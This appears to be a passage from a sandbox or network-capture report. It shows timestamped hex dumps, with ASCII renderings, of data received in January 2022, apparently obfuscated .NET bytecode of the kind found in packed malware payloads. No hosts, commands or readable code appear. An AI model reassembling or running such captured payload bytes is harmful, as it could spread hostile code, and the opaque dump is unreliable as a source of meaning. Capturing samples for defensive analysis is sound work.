00 00 38 33 b0 ff ff 20 b7 00 00 00 20 3d 00 00 00 59 fe 0e 0e 00 20 ed 00
                                                                                                                                  Data Ascii: g8 V(:& 8 0 0X 8''i( (9& 8 8' 8uX1 (:& 8x / jX@ lQ8W %(9>& 83 =Y
                                                                                                                                  2022-01-11 22:38:26 UTC30INData Raw: 20 77 00 00 00 20 4a 00 00 00 59 9c 20 5d 02 00 00 38 b1 ab ff ff 12 4f 28 72 00 00 0a 11 5c 1a 5a 6a 58 73 76 00 00 0a 11 6d 28 f3 00 00 06 28 00 01 00 06 20 63 01 00 00 28 1f 01 00 06 3a 84 ab ff ff 26 20 08 02 00 00 38 79 ab ff ff 20 e0 00 00 00 20 4a 00 00 00 59 fe 0e 40 00 20 a8 00 00 00 28 1f 01 00 06 39 5b ab ff ff 26 20 46 00 00 00 38 50 ab ff ff fe 0c 0a 00 20 18 00 00 00 fe 0c 40 00 9c 20 f1 00 00 00 28 1e 01 00 06 3a 33 ab ff ff 26 20 d4 00 00 00 38 28 ab ff ff 7e 4d 00 00 04 3a 22 c4 ff ff 20 ea 00 00 00 38 14 ab ff ff fe 0c 0a 00 20 03 00 00 00 fe 0c 40 00 9c 20 69 01 00 00 28 1e 01 00 06 3a f7 aa ff ff 26 20 66 01 00 00 38 ec aa ff ff 20 7d 00 00 00 20 5e 00 00 00 59 fe 0e 0e 00 20 d2 00 00 00 fe 0e 51 00 38 cb aa ff ff 2a 00 20 26 02 00 00
                                                                                                                                  Data Ascii: w JY ]8O(r\ZjXsvm(( c(:& 8y JY@ (9[& F8P @ (:3& 8(~M:" 8 @ i(:& f8 } ^Y Q8* &
                                                                                                                                  2022-01-11 22:38:26 UTC31INData Raw: 20 21 01 00 00 28 1e 01 00 06 3a 5f a6 ff ff 26 20 22 00 00 00 38 54 a6 ff ff 11 24 8e 69 1a 5b 13 22 20 66 02 00 00 38 42 a6 ff ff 11 23 11 54 61 13 59 20 4b 02 00 00 38 31 a6 ff ff 00 11 2a 73 76 00 00 0a d0 2e 00 00 02 28 03 01 00 06 28 08 01 00 06 74 2e 00 00 02 80 5c 00 00 04 20 00 00 00 00 28 1e 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 2f 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd 37 02 00 00 26 20 00 00 00 00 28 1e 01 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 37 00 45 02 00 00 00 05 00 00 00 d9 00 00 00 38 00 00 00 00 00 11 2a 73 76 00 00 0a d0 2e 00 00 02 28 03 01 00 06 28 08 01 00 06 13 28 20 00 00 00 00 28 1e 01 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 61 00 45 02 00 00 00 05 00 00
                                                                                                                                  Data Ascii: !(:_& "8T$i[" f8B#TaY K81*sv.((t.\ (:& 8/E87& (9& 87E8*sv.((( (9& 8aE
                                                                                                                                  2022-01-11 22:38:26 UTC32INData Raw: 01 a2 ff ff 11 1b 18 1f 72 9c 20 86 01 00 00 38 f1 a1 ff ff fe 0c 0a 00 20 1c 00 00 00 fe 0c 0e 00 9c 20 d3 00 00 00 28 1e 01 00 06 3a d4 a1 ff ff 26 20 2b 00 00 00 38 c9 a1 ff ff 20 16 00 00 00 20 1a 00 00 00 58 fe 0e 40 00 20 87 02 00 00 38 b0 a1 ff ff 38 22 ee ff ff 20 70 00 00 00 fe 0e 51 00 38 99 a1 ff ff 16 13 54 20 7f 02 00 00 38 90 a1 ff ff 1f 1e 13 1d 20 d0 00 00 00 28 1f 01 00 06 3a 7d a1 ff ff 26 20 a9 01 00 00 38 72 a1 ff ff fe 0c 0a 00 20 1f 00 00 00 20 5a 00 00 00 20 1d 00 00 00 58 9c 20 de 01 00 00 28 1f 01 00 06 39 4e a1 ff ff 26 20 a2 00 00 00 38 43 a1 ff ff 38 b6 c8 ff ff 20 e9 01 00 00 38 34 a1 ff ff fe 0c 05 00 20 0a 00 00 00 20 cf 00 00 00 20 45 00 00 00 59 9c 20 c9 00 00 00 28 1f 01 00 06 3a 10 a1 ff ff 26 20 a2 02 00 00 38 05 a1 ff
                                                                                                                                  Data Ascii: r 8 (:& +8 X@ 88" pQ8T 8 (:}& 8r Z X (9N& 8C8 84 EY (:& 8
                                                                                                                                  2022-01-11 22:38:26 UTC33INData Raw: 3a a7 9c ff ff 26 20 3d 00 00 00 38 9c 9c ff ff fe 0c 0a 00 20 0b 00 00 00 20 f1 00 00 00 20 50 00 00 00 59 9c 20 43 02 00 00 fe 0e 51 00 38 75 9c ff ff 12 5b fe 15 30 00 00 02 20 34 01 00 00 38 67 9c ff ff 38 86 c2 ff ff 20 14 01 00 00 38 58 9c ff ff 11 6d 28 e7 00 00 06 16 6a 28 e8 00 00 06 20 0d 00 00 00 28 1f 01 00 06 3a 3b 9c ff ff 26 20 8a 00 00 00 38 30 9c ff ff 28 d4 00 00 06 1a 40 d2 01 00 00 20 22 00 00 00 38 1b 9c ff ff 20 dc 00 00 00 20 0d 00 00 00 58 fe 0e 2c 00 20 72 01 00 00 38 02 9c ff ff fe 0c 0a 00 20 1e 00 00 00 fe 0c 40 00 9c 20 56 00 00 00 38 ea 9b ff ff 11 4f 11 18 1a 5a 1e 12 09 28 b0 00 00 06 26 20 6d 01 00 00 38 d1 9b ff ff 28 ce 00 00 06 28 d7 00 00 06 28 d8 00 00 06 13 62 20 06 00 00 00 28 1e 01 00 06 39 b1 9b ff ff 26 20 12 00
                                                                                                                                  Data Ascii: :& =8 PY CQ8u[0 48g8 8Xm(j( (:;& 80(@ "8 X, r8 @ V8OZ(& m8(((b (9&
                                                                                                                                  2022-01-11 22:38:26 UTC35INData Raw: 00 00 00 00 00 16 34 00 00 b2 01 00 00 c8 35 00 00 32 00 00 00 0a 00 00 01 00 00 00 00 65 5a 00 00 87 00 00 00 ec 5a 00 00 32 00 00 00 0a 00 00 01 00 00 00 00 e2 59 00 00 51 00 00 00 33 5a 00 00 0a 01 00 00 0a 00 00 01 02 00 00 00 0a 0c 00 00 03 01 00 00 0d 0d 00 00 30 00 00 00 00 00 00 00 00 00 00 00 1b 0b 00 00 5c 04 00 00 77 0f 00 00 32 00 00 00 0a 00 00 01 1b 30 04 00 fb 00 00 00 13 00 00 11 02 74 36 00 00 01 6f 79 00 00 0a 28 7a 00 00 0a 39 11 00 00 00 02 74 36 00 00 01 6f 79 00 00 0a 0a dd d3 00 00 00 dd 06 00 00 00 26 dd 00 00 00 00 00 02 74 36 00 00 01 6f 7b 00 00 0a 6f 7c 00 00 0a 6f 75 00 00 0a 72 e5 0f 00 70 72 01 00 00 70 6f 7d 00 00 0a 28 7a 00 00 0a 39 2a 00 00 00 02 74 36 00 00 01 6f 7b 00 00 0a 6f 7c 00 00 0a 6f 75 00 00 0a 72 e5 0f 00 70
                                                                                                                                  Data Ascii: 452eZZ2YQ3Z0\w20t6oy(z9t6oy&t6o{o|ourprpo}(z9*t6o{o|ourp
                                                                                                                                  2022-01-11 22:38:26 UTC36INData Raw: 62 09 58 11 04 61 0d 11 05 18 d3 18 5a 58 13 05 11 05 49 25 13 04 3a cc ff ff ff 08 09 20 65 8b 58 5d 5a 58 2a 00 00 00 13 30 04 00 c5 00 00 00 17 00 00 11 02 03 28 8d 00 00 0a 39 02 00 00 00 17 2a 02 39 06 00 00 00 03 3a 02 00 00 00 16 2a 16 0a 16 0b 16 0c 16 0d 02 7e 64 00 00 04 6f 8e 00 00 0a 39 2a 00 00 00 17 0a 02 1a 6f 8f 00 00 0a 02 1b 6f 8f 00 00 0a 1e 62 60 02 1c 6f 8f 00 00 0a 1f 10 62 60 02 1d 6f 8f 00 00 0a 1f 18 62 60 0c 03 7e 64 00 00 04 6f 8e 00 00 0a 39 2a 00 00 00 17 0b 03 1a 6f 8f 00 00 0a 03 1b 6f 8f 00 00 0a 1e 62 60 03 1c 6f 8f 00 00 0a 1f 10 62 60 03 1d 6f 8f 00 00 0a 1f 18 62 60 0d 06 3a 08 00 00 00 07 3a 02 00 00 00 16 2a 06 3a 07 00 00 00 02 28 b8 00 00 06 0c 07 3a 07 00 00 00 03 28 b8 00 00 06 0d 08 09 fe 01 2a 00 00 00 72 72 db
                                                                                                                                  Data Ascii: bXaZXI%: eX]ZX*0(9*9:*~do9*oob`ob`ob`~do9*oob`ob`ob`::*:(:(*rr
                                                                                                                                  2022-01-11 22:38:26 UTC37INData Raw: fe 09 02 00 6f b1 00 00 0a 2a 00 2e 00 fe 09 00 00 28 23 00 00 0a 2a 2e 00 fe 09 00 00 28 b2 00 00 0a 2a 1e 00 28 b3 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 29 00 00 0a 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 83 00 00 0a 2a 3e 00 fe 09 00 00 fe 09 01 00 28 a8 00 00 06 2a 2a fe 09 00 00 6f 35 01 00 06 2a 00 2e 00 fe 09 00 00 28 b4 00 00 0a 2a 2e 00 fe 09 00 00 28 b5 00 00 0a 2a 2e 00 fe 09 00 00 28 b6 00 00 0a 2a 2a fe 09 00 00 6f b7 00 00 0a 2a 00 2a fe 09 00 00 6f b8 00 00 0a 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 b9 00 00 0a 2a 2a fe 09 00 00 6f ba 00 00 0a 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 4a 00 00 0a 2a 2a fe 09 00 00 6f 4c 00 00 0a 2a 00 2a fe 09 00 00 6f bb 00 00 0a 2a 00 2a fe 09 00 00 6f bc 00 00 0a 2a 00 2a fe 09 00 00 28 74 00 00 0a 2a 00
                                                                                                                                  Data Ascii: o*.(#*.(*(*:o)*>(*>(**o5*.(*.(*.(**o**o*>(**o*>(J**oL**o**o**(t*
                                                                                                                                  2022-01-11 22:38:26 UTC39INData Raw: 00 4c 21 00 00 e0 27 00 00 37 16 00 00 5e 05 00 00 b3 11 00 00 03 0f 00 00 9a 02 00 00 c6 01 00 00 fb 11 00 00 c2 20 00 00 da 13 00 00 51 1a 00 00 11 0b 00 00 6c 16 00 00 92 1f 00 00 7d 0f 00 00 90 2b 00 00 2b 1e 00 00 2d 03 00 00 ff 1a 00 00 a9 07 00 00 8b 1e 00 00 99 23 00 00 f5 24 00 00 50 16 00 00 3b 11 00 00 e7 1f 00 00 54 0f 00 00 39 19 00 00 8c 03 00 00 36 2a 00 00 59 13 00 00 51 23 00 00 c2 2c 00 00 13 24 00 00 cd 05 00 00 bc 2a 00 00 4e 06 00 00 4e 2b 00 00 de 2c 00 00 e5 26 00 00 89 22 00 00 9b 2e 00 00 05 00 00 00 81 25 00 00 43 2f 00 00 0e 16 00 00 5f 2e 00 00 87 29 00 00 3a 0b 00 00 d2 0f 00 00 16 26 00 00 e0 1a 00 00 2f 07 00 00 53 1f 00 00 84 17 00 00 2b 2f 00 00 2e 29 00 00 0d 13 00 00 2f 24 00 00 51 04 00 00 17 14 00 00 86 00 00 00 5d 0c
                                                                                                                                  Data Ascii: L!'7^ Ql}++-#$P;T96*YQ#,$*NN+,&".%C/_.):&/S+/.)/$Q]
                                                                                                                                  2022-01-11 22:38:26 UTC40INData Raw: fe 0e 28 00 20 53 01 00 00 38 f9 f7 ff ff fe 0c 0e 00 20 1e 00 00 00 fe 0c 29 00 9c 20 dd 00 00 00 28 74 01 00 06 39 dc f7 ff ff 26 20 7d 00 00 00 38 d1 f7 ff ff fe 0c 0e 00 20 1e 00 00 00 fe 0c 29 00 9c 20 fd 00 00 00 fe 0e 20 00 38 b1 f7 ff ff fe 0c 11 00 20 0e 00 00 00 fe 0c 28 00 9c 20 7c 00 00 00 28 74 01 00 06 3a 98 f7 ff ff 26 20 8b 00 00 00 38 8d f7 ff ff 16 13 14 20 5b 01 00 00 28 74 01 00 06 39 7b f7 ff ff 26 20 02 00 00 00 38 70 f7 ff ff 20 8b 00 00 00 20 2e 00 00 00 59 fe 0e 29 00 20 c0 00 00 00 28 74 01 00 06 39 52 f7 ff ff 26 20 96 00 00 00 38 47 f7 ff ff 7e 77 00 00 04 74 36 00 00 01 28 72 01 00 06 80 76 00 00 04 20 02 00 00 00 fe 0e 20 00 38 21 f7 ff ff fe 0c 0e 00 20 14 00 00 00 fe 0c 29 00 9c 20 28 00 00 00 38 0d f7 ff ff 73 73 00 00 0a
                                                                                                                                  Data Ascii: ( S8 ) (t9& }8 ) 8 ( |(t:& 8 [(t9{& 8p .Y) (t9R& 8G~wt6(rv 8! ) (8ss
                                                                                                                                  2022-01-11 22:38:26 UTC41INData Raw: 00 00 58 9c 20 e3 00 00 00 28 74 01 00 06 39 9b f2 ff ff 26 20 8f 00 00 00 38 90 f2 ff ff 38 aa 25 00 00 20 86 01 00 00 38 81 f2 ff ff 20 11 00 00 00 20 7a 00 00 00 58 fe 0e 29 00 20 8c 00 00 00 fe 0e 20 00 38 60 f2 ff ff fe 0c 0e 00 20 0c 00 00 00 20 7b 00 00 00 20 39 00 00 00 58 9c 20 9e 00 00 00 28 73 01 00 06 3a 40 f2 ff ff 26 20 97 00 00 00 38 35 f2 ff ff fe 0c 0e 00 20 08 00 00 00 20 74 00 00 00 20 6b 00 00 00 59 9c 20 e0 00 00 00 38 16 f2 ff ff 20 4d 00 00 00 20 5e 00 00 00 58 fe 0e 29 00 20 7b 00 00 00 38 fd f1 ff ff fe 0c 0e 00 20 04 00 00 00 20 1c 00 00 00 20 18 00 00 00 58 9c 20 0b 01 00 00 38 de f1 ff ff 20 46 00 00 00 20 3b 00 00 00 58 fe 0e 29 00 20 70 00 00 00 28 74 01 00 06 3a c0 f1 ff ff 26 20 c8 00 00 00 38 b5 f1 ff ff fe 0c 0e 00 20 02
                                                                                                                                  Data Ascii: X (t9& 88% 8 zX) 8` { 9X (s:@& 85 t kY 8 M ^X) {8 X 8 F ;X) p(t:& 8
                                                                                                                                  2022-01-11 22:38:26 UTC43INData Raw: 9c 20 21 00 00 00 38 4a ed ff ff 20 aa 00 00 00 20 38 00 00 00 59 fe 0e 28 00 20 76 00 00 00 28 73 01 00 06 3a 2c ed ff ff 26 20 1c 00 00 00 38 21 ed ff ff fe 0c 11 00 20 0e 00 00 00 20 80 00 00 00 20 2a 00 00 00 59 9c 20 f1 00 00 00 38 02 ed ff ff fe 0c 0e 00 20 13 00 00 00 fe 0c 29 00 9c 20 d5 00 00 00 28 73 01 00 06 3a e5 ec ff ff 26 20 03 00 00 00 38 da ec ff ff 11 06 8e 69 1a 5b 13 09 20 49 01 00 00 38 c8 ec ff ff fe 0c 0e 00 20 1c 00 00 00 20 87 00 00 00 20 02 00 00 00 58 9c 20 00 00 00 00 28 73 01 00 06 3a a4 ec ff ff 26 20 00 00 00 00 38 99 ec ff ff fe 0c 0e 00 20 0b 00 00 00 fe 0c 29 00 9c 20 8a 00 00 00 38 81 ec ff ff fe 0c 11 00 20 0d 00 00 00 20 92 00 00 00 20 30 00 00 00 59 9c 20 04 01 00 00 38 62 ec ff ff fe 0c 0e 00 20 07 00 00 00 fe 0c 29
                                                                                                                                  Data Ascii: !8J 8Y( v(s:,& 8! *Y 8 ) (s:& 8i[ I8 X (s:& 8 ) 8 0Y 8b )
                                                                                                                                  2022-01-11 22:38:26 UTC44INData Raw: 00 00 00 58 9c 20 b1 00 00 00 28 73 01 00 06 3a e8 e7 ff ff 26 20 7e 00 00 00 38 dd e7 ff ff 20 e3 00 00 00 20 4b 00 00 00 59 fe 0e 28 00 20 31 01 00 00 38 c4 e7 ff ff fe 0c 11 00 20 0f 00 00 00 20 78 00 00 00 20 17 00 00 00 58 9c 20 cb 00 00 00 38 a5 e7 ff ff fe 0c 0e 00 20 04 00 00 00 20 58 00 00 00 20 22 00 00 00 58 9c 20 4f 00 00 00 38 86 e7 ff ff fe 0c 0e 00 20 00 00 00 00 fe 0c 29 00 9c 20 44 01 00 00 38 6e e7 ff ff fe 0c 0e 00 20 09 00 00 00 fe 0c 29 00 9c 20 1f 00 00 00 28 74 01 00 06 3a 51 e7 ff ff 26 20 96 00 00 00 38 46 e7 ff ff 11 26 11 23 11 26 11 23 91 11 1a 11 23 91 61 d2 9c 20 cc 00 00 00 38 2b e7 ff ff 20 08 00 00 00 20 52 00 00 00 58 fe 0e 29 00 20 0e 00 00 00 38 12 e7 ff ff fe 0c 0e 00 20 0e 00 00 00 20 90 00 00 00 20 5f 00 00 00 59 9c
                                                                                                                                  Data Ascii: X (s:& ~8 KY( 18 x X 8 X "X O8 ) D8n ) (t:Q& 8F&#&##a 8+ RX) 8 _Y
                                                                                                                                  2022-01-11 22:38:26 UTC45INData Raw: ff fe 0c 0e 00 20 19 00 00 00 20 94 00 00 00 20 31 00 00 00 59 9c 20 7e 00 00 00 38 83 e2 ff ff fe 0c 11 00 20 09 00 00 00 20 b9 00 00 00 20 3d 00 00 00 59 9c 20 db 00 00 00 38 64 e2 ff ff 20 2b 00 00 00 20 12 00 00 00 58 fe 0e 28 00 20 27 00 00 00 28 73 01 00 06 3a 46 e2 ff ff 26 20 18 00 00 00 38 3b e2 ff ff fe 0c 0e 00 20 0c 00 00 00 20 d6 00 00 00 20 47 00 00 00 59 9c 20 48 01 00 00 38 1c e2 ff ff fe 0c 0e 00 20 13 00 00 00 20 bf 00 00 00 20 45 00 00 00 59 9c 20 1f 00 00 00 28 74 01 00 06 3a f8 e1 ff ff 26 20 88 00 00 00 38 ed e1 ff ff fe 0c 0e 00 20 11 00 00 00 20 92 00 00 00 20 29 00 00 00 58 9c 20 8d 00 00 00 28 73 01 00 06 39 c9 e1 ff ff 26 20 23 01 00 00 38 be e1 ff ff 20 92 00 00 00 20 4c 00 00 00 59 fe 0e 29 00 20 1c 00 00 00 28 73 01 00 06 39
                                                                                                                                  Data Ascii: 1Y ~8 =Y 8d + X( '(s:F& 8; GY H8 EY (t:& 8 )X (s9& #8 LY) (s9
                                                                                                                                  2022-01-11 22:38:26 UTC47INData Raw: 00 00 00 38 42 dd ff ff 00 11 15 11 25 28 6d 01 00 06 20 00 00 00 00 28 73 01 00 06 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 19 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd e1 06 00 00 11 15 3a 53 00 00 00 20 00 00 00 00 28 73 01 00 06 39 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 12 00 45 03 00 00 00 24 00 00 00 05 00 00 00 39 00 00 00 38 1f 00 00 00 38 2f 00 00 00 20 00 00 00 00 28 74 01 00 06 3a d6 ff ff ff 26 20 00 00 00 00 38 cb ff ff ff 11 15 28 6e 01 00 06 20 02 00 00 00 fe 0e 12 00 38 b2 ff ff ff dc 20 bd 00 00 00 fe 0e 20 00 38 85 dc ff ff 38 ae 12 00 00 20 37 00 00 00 38 7a dc ff ff fe 0c 11 00 20 0d 00 00 00 fe 0c 28 00 9c 20 14 01 00 00 28 74 01 00 06 39 5d dc ff ff 26 20 11 01 00 00 38 52 dc ff ff fe 0c 0e 00 20 05 00
                                                                                                                                  Data Ascii: 8B%(m (s9& 8E8:S (s9& 8E$988/ (t:& 8(n 8 88 78z ( (t9]& 8R
                                                                                                                                  2022-01-11 22:38:26 UTC48INData Raw: d4 00 00 00 20 46 00 00 00 59 fe 0e 29 00 20 c9 00 00 00 28 74 01 00 06 3a d4 d7 ff ff 26 20 f5 00 00 00 38 c9 d7 ff ff fe 0c 11 00 20 06 00 00 00 20 ce 00 00 00 20 44 00 00 00 59 9c 20 69 00 00 00 28 73 01 00 06 39 a5 d7 ff ff 26 20 80 01 00 00 38 9a d7 ff ff fe 0c 0e 00 20 04 00 00 00 fe 0c 29 00 9c 20 81 01 00 00 38 82 d7 ff ff fe 0c 0e 00 20 09 00 00 00 20 34 00 00 00 20 68 00 00 00 58 9c 20 17 00 00 00 28 74 01 00 06 3a 5e d7 ff ff 26 20 34 01 00 00 38 53 d7 ff ff 20 d7 00 00 00 20 47 00 00 00 59 fe 0e 29 00 20 3e 01 00 00 fe 0e 20 00 38 32 d7 ff ff fe 0c 0e 00 20 16 00 00 00 fe 0c 29 00 9c 20 c6 00 00 00 28 73 01 00 06 3a 19 d7 ff ff 26 20 0b 00 00 00 38 0e d7 ff ff 11 14 11 05 3f bf 0c 00 00 20 59 00 00 00 38 fb d6 ff ff 20 bb 00 00 00 20 29 00 00
                                                                                                                                  Data Ascii: FY) (t:& 8 DY i(s9& 8 ) 8 4 hX (t:^& 48S GY) > 82 ) (s:& 8? Y8 )
                                                                                                                                  2022-01-11 22:38:26 UTC49INData Raw: 94 d2 ff ff 26 20 72 00 00 00 38 89 d2 ff ff 20 32 00 00 00 20 35 00 00 00 58 fe 0e 28 00 20 0c 01 00 00 38 70 d2 ff ff fe 0c 11 00 13 1a 20 51 00 00 00 28 73 01 00 06 39 5b d2 ff ff 26 20 4b 01 00 00 38 50 d2 ff ff fe 0c 0e 00 20 18 00 00 00 fe 0c 29 00 9c 20 58 00 00 00 38 38 d2 ff ff 20 c5 00 00 00 20 39 00 00 00 58 fe 0e 29 00 20 54 00 00 00 28 73 01 00 06 39 1a d2 ff ff 26 20 79 00 00 00 38 0f d2 ff ff fe 0c 0e 00 20 0f 00 00 00 fe 0c 29 00 9c 20 d4 00 00 00 38 f7 d1 ff ff fe 0c 0e 00 20 06 00 00 00 fe 0c 29 00 9c 20 12 00 00 00 38 df d1 ff ff 20 0c 00 00 00 20 1a 00 00 00 58 fe 0e 29 00 20 70 01 00 00 28 73 01 00 06 3a c1 d1 ff ff 26 20 b6 00 00 00 38 b6 d1 ff ff fe 0c 11 00 20 0b 00 00 00 fe 0c 28 00 9c 20 1f 01 00 00 38 9e d1 ff ff 20 d4 00 00 00
                                                                                                                                  Data Ascii: & r8 2 5X( 8p Q(s9[& K8P ) X88 9X) T(s9& y8 ) 8 ) 8 X) p(s:& 8 ( 8
                                                                                                                                  2022-01-11 22:38:26 UTC51INData Raw: 26 20 52 00 00 00 38 34 cd ff ff fe 0c 0e 00 20 05 00 00 00 20 25 00 00 00 20 60 00 00 00 58 9c 20 72 01 00 00 38 15 cd ff ff fe 0c 0e 00 20 11 00 00 00 fe 0c 29 00 9c 20 77 00 00 00 38 fd cc ff ff fe 0c 0e 00 20 08 00 00 00 fe 0c 29 00 9c 20 27 01 00 00 fe 0e 20 00 38 dd cc ff ff 11 0b 11 09 3f 3b db ff ff 20 16 01 00 00 38 ce cc ff ff 11 08 1e 62 13 08 20 3b 00 00 00 fe 0e 20 00 38 b6 cc ff ff fe 0c 0e 00 20 1e 00 00 00 20 79 00 00 00 20 2e 00 00 00 58 9c 20 55 01 00 00 fe 0e 20 00 38 93 cc ff ff 20 91 00 00 00 20 12 00 00 00 58 fe 0e 28 00 20 41 01 00 00 38 7e cc ff ff fe 0c 11 00 20 07 00 00 00 fe 0c 28 00 9c 20 85 00 00 00 38 66 cc ff ff fe 0c 11 00 20 05 00 00 00 fe 0c 28 00 9c 20 7f 01 00 00 28 74 01 00 06 39 49 cc ff ff 26 20 31 01 00 00 38 3e cc
                                                                                                                                  Data Ascii: & R84 % `X r8 ) w8 ) ' 8?; 8b ; 8 y .X U 8 X( A8~ ( 8f ( (t9I& 18>
                                                                                                                                  2022-01-11 22:38:26 UTC52INData Raw: 61 fe 0c 18 00 58 fe 0e 18 00 fe 0c 18 00 76 6c 6d 58 13 2a 20 92 00 00 00 38 c8 c7 ff ff 00 00 01 10 00 00 02 00 d1 22 3a 0b 23 70 00 00 00 00 13 30 04 00 5c 00 00 00 00 00 00 00 02 d0 3a 00 00 02 28 23 00 00 0a 6f 24 00 00 0a 28 cb 00 00 0a 39 3b 00 00 00 7e 78 00 00 04 3a 05 00 00 00 28 60 01 00 06 73 cc 00 00 0a 25 02 6f cd 00 00 0a 6f ce 00 00 0a 25 7e 77 00 00 04 74 36 00 00 01 6f cd 00 00 0a 6f ce 00 00 0a 6f cf 00 00 0a 2a 02 6f cd 00 00 0a 2a 13 30 03 00 4d 00 00 00 1c 00 00 11 7e 78 00 00 04 3a 05 00 00 00 28 60 01 00 06 03 6f d0 00 00 0a 0a 16 0b 38 21 00 00 00 7e 76 00 00 04 07 9a 06 28 8d 00 00 0a 39 0b 00 00 00 7e 77 00 00 04 74 36 00 00 01 2a 07 17 58 0b 07 7e 76 00 00 04 8e 69 3f d2 ff ff ff 14 2a 00 00 00 8a 02 28 09 00 00 0a 28 d1 00 00
                                                                                                                                  Data Ascii: aXvlmX* 8":#p0\:(#o$(9;~x:(`s%oo%~wt6ooo*o*0M~x:(`o8!~v(9~wt6*X~vi?*((
                                                                                                                                  2022-01-11 22:38:26 UTC53INData Raw: 00 00 00 12 00 00 14 2a 00 00 00 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00
                                                                                                                                  Data Ascii: *0*0*0*0*0*0*0*0*0*0*0*0*0*0*0*0
                                                                                                                                  2022-01-11 22:38:26 UTC55INData Raw: 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 03 00 04
                                                                                                                                  Data Ascii: *0*0*0*0*0*0*0*0*0**0*0*0*0****0
                                                                                                                                  2022-01-11 22:38:26 UTC59INData Raw: 00 00 00 17 2a 01 10 00 00 02 00 1d 00 49 66 00 13 00 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 01 1c 00 00 00 00 31 00 16 47 00 0b 0a 00 00 01 02 00 07 00 55 5c 00 13 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 34 00 00 02 00 00 00 e6 01 00 00 f7 00 00 00 dd 02 00 00 13 00 00 00 00 00 00 00 00 00 00 00 59 00 00 00 12 00 00 00 6b 00 00 00 46 03 00 00 0f 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 02 00 00 00 17 00 00 00 04 01 00 00 1b 01 00 00 13 00 00 00 00 00 00 00 03 30 08 00 04 00
                                                                                                                                  Data Ascii: *If**(*(*(*(*(*0*0*1GU\0*A4YkF0*A0
                                                                                                                                  2022-01-11 22:38:26 UTC63INData Raw: 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f b7 05 00 06 2a 00 42 28 a9 00 00 06 d0 b4 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f bb 05 00 06 2a 00 42 28 a9 00 00 06 d0 b5 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f bf 05 00 06 2a 00 42 28 a9 00 00 06 d0 b6 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f c3 05 00 06 2a 00 42 28 a9 00 00 06 d0 b7 00 00 02 28 a0 00 00 06 2a 00 00 00 3a 0e 03 0e 00 0e 01 0e 02 6f c7 05 00 06 2a 00 42 28 a9 00 00 06 d0 b8 00 00 02 28 a0 00 00 06 2a 00 00 00 3a 0e 03 0e 00 0e 01 0e 02 6f cb 05 00 06 2a 00 42 28 a9 00 00 06 d0 b9 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f cf 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 ba 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01
                                                                                                                                  Data Ascii: (**o*B((**o*B((**o*B((**o*B((*:o*B((*:o*B((*2o*B((*2
